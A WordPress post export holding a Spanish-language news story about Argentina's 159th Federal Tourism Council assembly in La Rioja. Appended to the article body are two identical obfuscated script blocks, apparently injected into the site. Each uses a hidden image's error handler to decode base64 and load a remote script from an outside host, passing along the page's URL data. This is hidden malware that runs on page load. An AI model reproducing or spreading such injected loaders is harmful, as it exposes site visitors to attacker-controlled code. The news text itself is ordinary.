{"id":1283,"date":"2022-08-11T10:10:56","date_gmt":"2022-08-11T13:10:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1283"},"modified":"2025-08-14T00:38:47","modified_gmt":"2025-08-14T03:38:47","slug":"lammens-y-quintela-encabezaron-la-159-asamblea-del-cft","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1283","title":{"rendered":"Lammens y Quintela encabezaron la 159\u00b0 Asamblea del CFT"},"content":{"rendered":"\n<h3 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\">\u201cVamos a relanzar PreViaje para mantener los niveles de ocupaci\u00f3n durante todo el a\u00f1o\u201d, asegur\u00f3 el ministro nacional.<\/h3>\n\n\n\n<p>El ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;<strong>Mat\u00edas Lammens<\/strong>, y el gobernador de&nbsp;<strong>La Rioja<\/strong>,&nbsp;<strong>Ricardo Quintela<\/strong>, encabezaron la 159\u00b0 Asamblea del&nbsp;<strong>Consejo Federal de Turismo (CFT)<\/strong>&nbsp;que se llev\u00f3 adelante en la provincia norte\u00f1a.<\/p>\n\n\n\n<p><em>\u00abEste Consejo Federal de Turismo es una gran muestra de que es posible trabajar en conjunto. Ya no hablamos m\u00e1s de recuperaci\u00f3n del sector, hablamos de crecimiento. Los n\u00fameros de la temporada nos sorprenden a nosotros mismos: un 17% de incremento del turismo dom\u00e9stico en la temporada de invierno. Estamos en valores por encima de la prepandemia. Y adem\u00e1s, el turismo sigue empujando la reactivaci\u00f3n del empleo registrado: en el \u00edndice interanual de mayo, encabez\u00f3 las estad\u00edsticas de crecimiento con un 2,2%\u00bb<\/em>, asegur\u00f3&nbsp;<strong>Lammens<\/strong>.<\/p>\n\n\n\n<p>Sobre la provincia anfitriona, el ministro expres\u00f3:&nbsp;<em>\u00abComo lo hemos hecho desde la Naci\u00f3n, La Rioja puso al turismo como uno de los grandes impulsores del desarrollo de la Argentina, de la generaci\u00f3n de empleo y de la importancia que tiene la infraestructura tur\u00edstica. Adem\u00e1s mostr\u00f3 m\u00e1s del 90% de ocupaci\u00f3n en las vacaciones de invierno con un impacto econ\u00f3mico de $1300 millones\u00bb<\/em>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"294\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_-1024x294.jpeg\" alt=\"\" class=\"wp-image-1284\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_-1024x294.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_-300x86.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_-768x220.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_-1536x441.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_-696x200.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_-1068x306.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_-1464x420.jpeg 1464w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_11-8-2022_10853_www.argentina.gob_.ar_.jpeg 1722w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><em>\u00abEl turismo es fundamental para nosotros. Queremos visibilizar a nuestra provincia: sus bellezas naturales, su gente, su historia y su cultura. Abrazarnos con las argentinas y los argentinos para que nos conozcan y as\u00ed seguir ayudando para poner de pie a nuestro pa\u00eds\u00bb<\/em>, subray\u00f3 el gobernador.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron presentes la vicegobernadora&nbsp;<strong>Florencia L\u00f3pez<\/strong>; la secretaria de Promoci\u00f3n Tur\u00edstica,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>; el ministro de Turismo y Culturas de La Rioja,&nbsp;<strong>Gustavo Luna<\/strong>; el presidente del CFT,&nbsp;<strong>Sebasti\u00e1n Giobellina<\/strong>; el secretario ejecutivo del INPROTUR,&nbsp;<strong>Ricardo Sosa<\/strong>; el presidente de la C\u00e1mara Argentina de Turismo,&nbsp;<strong>Gustavo Hani<\/strong>, y representantes de todas las provincias del pa\u00eds.<\/p>\n\n\n\n<p>Durante el encuentro, el ministro&nbsp;<strong>Lammens<\/strong>&nbsp;asegur\u00f3 que pronto se anunciar\u00e1 la pr\u00f3xima edici\u00f3n del programa&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/noticias\/previaje.gob.ar\">PreViaje<\/a>, focalizada en las temporadas medias y bajas. Las autoridades tambi\u00e9n repasaron los impactos de la temporada de invierno, en la que se movilizaron m\u00e1s de&nbsp;<strong>5.2 millones de turistas nacionales<\/strong>&nbsp;y&nbsp;<strong>420 mil del extranjero<\/strong>, entre otros temas.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cVamos a relanzar PreViaje para mantener los niveles de ocupaci\u00f3n durante todo el a\u00f1o\u201d, asegur\u00f3 el ministro nacional. El ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;Mat\u00edas Lammens, y el gobernador de&nbsp;La Rioja,&nbsp;Ricardo Quintela, encabezaron la 159\u00b0 Asamblea del&nbsp;Consejo Federal de Turismo (CFT)&nbsp;que se llev\u00f3 adelante en la provincia norte\u00f1a. \u00abEste Consejo Federal de Turismo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1285,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-1283","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1283"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1283"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1283\/revisions"}],"predecessor-version":[{"id":7398,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1283\/revisions\/7398"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1285"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1283"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1283"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1283"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}